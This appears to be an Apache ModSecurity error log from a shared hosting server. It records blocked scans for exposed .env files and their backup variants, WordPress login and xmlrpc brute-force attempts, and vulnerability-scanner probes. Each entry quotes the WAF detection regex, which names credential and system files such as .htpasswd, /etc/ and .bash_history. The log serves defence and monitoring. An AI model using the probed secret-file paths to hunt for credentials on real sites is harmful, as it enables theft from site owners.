[Tue May 26 12:53:16.287456 2026] [security2:error] [pid 461618:tid 461775] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKY1yiSlSCHr1fdr2plQAAAKA"]
[Tue May 26 12:53:17.166025 2026] [security2:error] [pid 461618:tid 461822] [client 176.65.139.236:39672] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "medlivon.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVKZVyiSlSCHr1fdr2pvAAAAM8"]
[Tue May 26 12:53:18.036916 2026] [security2:error] [pid 461618:tid 461802] [client 176.65.139.239:58024] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.enattafoodparcel.org.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVKZlyiSlSCHr1fdr2p4AAAALs"]
[Tue May 26 12:53:18.211710 2026] [security2:error] [pid 461618:tid 461800] [client 157.20.138.61:57773] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKZlyiSlSCHr1fdr2p6AAAALk"]
[Tue May 26 12:53:18.211832 2026] [security2:error] [pid 461618:tid 461800] [client 157.20.138.61:57773] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKZlyiSlSCHr1fdr2p6AAAALk"]
[Tue May 26 12:53:18.699912 2026] [security2:error] [pid 461618:tid 461728] [remote 172.194.139.254:13623] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.139.194.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVKZlyiSlSCHr1fdr2p9gAAmm0"]
[Tue May 26 12:53:19.261200 2026] [security2:error] [pid 461618:tid 461794] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKZlyiSlSCHr1fdr2p_gAAALM"]
[Tue May 26 12:53:19.795886 2026] [security2:error] [pid 461618:tid 461661] [remote 51.91.98.45:41618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVKZ1yiSlSCHr1fdr2qGQAA9So"]
[Tue May 26 12:53:22.130871 2026] [security2:error] [pid 461618:tid 461767] [client 85.121.55.185:48338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 185.55.121.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/site/wp-admin/admin-ajax.php"] [unique_id "ahVKalyiSlSCHr1fdr2qmwAAAJg"]
[Tue May 26 12:53:22.134730 2026] [security2:error] [pid 461618:tid 461766] [client 74.7.230.5:59624] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.karuppuswamykovil.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVKalyiSlSCHr1fdr2qngAAl2I"]
[Tue May 26 12:53:22.229112 2026] [security2:error] [pid 461618:tid 461824] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKaVyiSlSCHr1fdr2qkQAAANE"]
[Tue May 26 12:53:23.089651 2026] [security2:error] [pid 461618:tid 461785] [client 85.121.55.185:48328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 185.55.121.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/site/wp-login.php"] [unique_id "ahVKalyiSlSCHr1fdr2qvgAAAKo"], referer: https://moes-art.com/site/wp-admin/
[Tue May 26 12:53:24.859998 2026] [security2:error] [pid 461618:tid 461783] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKbFyiSlSCHr1fdr2q-wAAAKg"]
[Tue May 26 12:53:27.143939 2026] [security2:error] [pid 461618:tid 461752] [client 85.121.55.185:34600] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKb1yiSlSCHr1fdr2rNAAAAIk"]
[Tue May 26 12:53:28.053709 2026] [security2:error] [pid 461618:tid 461864] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKb1yiSlSCHr1fdr2rRgAAAPk"]
[Tue May 26 12:53:28.648734 2026] [security2:error] [pid 461618:tid 461797] [client 74.249.173.207:5081] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/rip.php"] [unique_id "ahVKcFyiSlSCHr1fdr2rZgAAALY"]
[Tue May 26 12:53:28.846104 2026] [security2:error] [pid 461618:tid 461855] [client 172.225.77.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVKcFyiSlSCHr1fdr2rZQAAAPA"]
[Tue May 26 12:53:28.874005 2026] [security2:error] [pid 461618:tid 461799] [client 157.20.138.61:58134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKcFyiSlSCHr1fdr2raQAAALg"]
[Tue May 26 12:53:28.874138 2026] [security2:error] [pid 461618:tid 461799] [client 157.20.138.61:58134] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKcFyiSlSCHr1fdr2raQAAALg"]
[Tue May 26 12:53:30.117614 2026] [security2:error] [pid 461618:tid 461848] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKcVyiSlSCHr1fdr2rhAAAAOk"]
[Tue May 26 12:53:31.814553 2026] [security2:error] [pid 461618:tid 461654] [remote 88.198.91.116:57836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVKc1yiSlSCHr1fdr2rsAAAviM"]
[Tue May 26 12:53:32.024198 2026] [security2:error] [pid 461618:tid 461749] [client 74.249.173.207:5068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahVKdFyiSlSCHr1fdr2ruAAAAIY"]
[Tue May 26 12:53:32.608177 2026] [security2:error] [pid 461618:tid 461801] [client 106.77.157.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKdFyiSlSCHr1fdr2rvgAAALo"]
[Tue May 26 12:53:32.996329 2026] [security2:error] [pid 461618:tid 461757] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKdFyiSlSCHr1fdr2rzgAAAI4"]
[Tue May 26 12:53:35.031395 2026] [security2:error] [pid 461618:tid 461843] [client 74.249.173.207:5104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVKd1yiSlSCHr1fdr2sNQAAAOQ"]
[Tue May 26 12:53:36.562913 2026] [security2:error] [pid 461618:tid 461752] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKeFyiSlSCHr1fdr2sXgAAAIk"]
[Tue May 26 12:53:36.882173 2026] [security2:error] [pid 461618:tid 461784] [client 195.178.110.34:49354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.canopykaapi.com"] [uri "/phpinfo.php"] [unique_id "ahVKeFyiSlSCHr1fdr2sbAAAAKk"]
[Tue May 26 12:53:37.194912 2026] [security2:error] [pid 461618:tid 461830] [client 195.178.110.34:49364] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/portal/.env"] [unique_id "ahVKeVyiSlSCHr1fdr2sdAAAANc"]
[Tue May 26 12:53:38.562972 2026] [security2:error] [pid 461618:tid 461865] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKelyiSlSCHr1fdr2smgAAAPo"]
[Tue May 26 12:53:39.204795 2026] [security2:error] [pid 461618:tid 461755] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKe1yiSlSCHr1fdr2sswAAAIw"]
[Tue May 26 12:53:39.549704 2026] [security2:error] [pid 461618:tid 461794] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKe1yiSlSCHr1fdr2ssgAAALM"]
[Tue May 26 12:53:39.645331 2026] [security2:error] [pid 461618:tid 461795] [client 157.20.138.61:58499] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKe1yiSlSCHr1fdr2swwAAALQ"]
[Tue May 26 12:53:39.645538 2026] [security2:error] [pid 461618:tid 461795] [client 157.20.138.61:58499] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKe1yiSlSCHr1fdr2swwAAALQ"]
[Tue May 26 12:53:40.288127 2026] [security2:error] [pid 461618:tid 461769] [client 74.249.173.207:4828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/cache.php"] [unique_id "ahVKfFyiSlSCHr1fdr2s1QAAAJo"]
[Tue May 26 12:53:40.733943 2026] [security2:error] [pid 461618:tid 461831] [client 208.84.100.109:61248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env"] [unique_id "ahVKfFyiSlSCHr1fdr2s5QAAANg"]
[Tue May 26 12:53:40.737966 2026] [security2:error] [pid 461618:tid 461818] [client 208.84.100.109:30312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/api/.env"] [unique_id "ahVKfFyiSlSCHr1fdr2s6QAAAMs"]
[Tue May 26 12:53:40.738427 2026] [security2:error] [pid 461618:tid 461875] [client 208.84.100.109:30326] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVKfFyiSlSCHr1fdr2s6AAAAQQ"]
[Tue May 26 12:53:40.741204 2026] [security2:error] [pid 461618:tid 461775] [client 208.84.100.109:30296] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/app/.env"] [unique_id "ahVKfFyiSlSCHr1fdr2s6gAAAKA"]
[Tue May 26 12:53:40.994508 2026] [security2:error] [pid 461618:tid 461794] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKfFyiSlSCHr1fdr2s8wAAALM"]
[Tue May 26 12:53:41.680401 2026] [security2:error] [pid 461618:tid 461858] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKfVyiSlSCHr1fdr2tGAAAAPM"]
[Tue May 26 12:53:42.112910 2026] [security2:error] [pid 461618:tid 461812] [client 14.173.164.89:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVKe1yiSlSCHr1fdr2suAAAxUg"]
[Tue May 26 12:53:42.774629 2026] [security2:error] [pid 461618:tid 461771] [client 74.249.173.207:4818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVKflyiSlSCHr1fdr2tTwAAAJw"]
[Tue May 26 12:53:43.914907 2026] [security2:error] [pid 461618:tid 461774] [client 176.65.139.239:20092] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.holix.ktmadvance-senegal.com"] [uri "/.env"] [unique_id "ahVKf1yiSlSCHr1fdr2tbwAAAJ8"]
[Tue May 26 12:53:44.000496 2026] [security2:error] [pid 461618:tid 461784] [client 176.65.139.237:63922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.encaf.ktmadvance-senegal.com"] [uri "/.env"] [unique_id "ahVKf1yiSlSCHr1fdr2tcwAAAKk"]
[Tue May 26 12:53:44.545071 2026] [security2:error] [pid 461618:tid 461854] [client 208.84.100.109:30280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.copy"] [unique_id "ahVKgFyiSlSCHr1fdr2tgwAAAO8"]
[Tue May 26 12:53:44.622768 2026] [security2:error] [pid 461618:tid 461819] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKgFyiSlSCHr1fdr2tdgAAAMw"]
[Tue May 26 12:53:44.989474 2026] [security2:error] [pid 461618:tid 461803] [client 45.132.227.20:47343] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVKflyiSlSCHr1fdr2tSAAAALw"]
[Tue May 26 12:53:45.114734 2026] [security2:error] [pid 461618:tid 461807] [client 195.178.110.34:40928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahVKgVyiSlSCHr1fdr2tlwAAAMA"]
[Tue May 26 12:53:45.210609 2026] [security2:error] [pid 461618:tid 461763] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKgVyiSlSCHr1fdr2tmAAAAJQ"]
[Tue May 26 12:53:45.625662 2026] [security2:error] [pid 461618:tid 461792] [client 173.252.79.116:50688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKgVyiSlSCHr1fdr2tpQAAsXE"]
[Tue May 26 12:53:45.914801 2026] [security2:error] [pid 461618:tid 461866] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKgVyiSlSCHr1fdr2tsQAAAPs"]
[Tue May 26 12:53:46.028601 2026] [security2:error] [pid 461618:tid 461857] [client 173.252.79.116:50700] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKgVyiSlSCHr1fdr2ttAAA8mY"]
[Tue May 26 12:53:46.047469 2026] [security2:error] [pid 461618:tid 461757] [client 208.84.100.109:30650] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env~"] [unique_id "ahVKglyiSlSCHr1fdr2tuwAAAI4"]
[Tue May 26 12:53:46.047759 2026] [security2:error] [pid 461618:tid 461800] [client 208.84.100.109:30612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.old"] [unique_id "ahVKglyiSlSCHr1fdr2tvQAAALk"]
[Tue May 26 12:53:46.047885 2026] [security2:error] [pid 461618:tid 461854] [client 208.84.100.109:30604] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.bak"] [unique_id "ahVKglyiSlSCHr1fdr2twQAAAO8"]
[Tue May 26 12:53:46.048810 2026] [security2:error] [pid 461618:tid 461780] [client 208.84.100.109:30622] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.backup"] [unique_id "ahVKglyiSlSCHr1fdr2twgAAAKU"]
[Tue May 26 12:53:46.241849 2026] [security2:error] [pid 461618:tid 461786] [client 208.84.100.109:30280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.swp"] [unique_id "ahVKglyiSlSCHr1fdr2tyQAAAKs"]
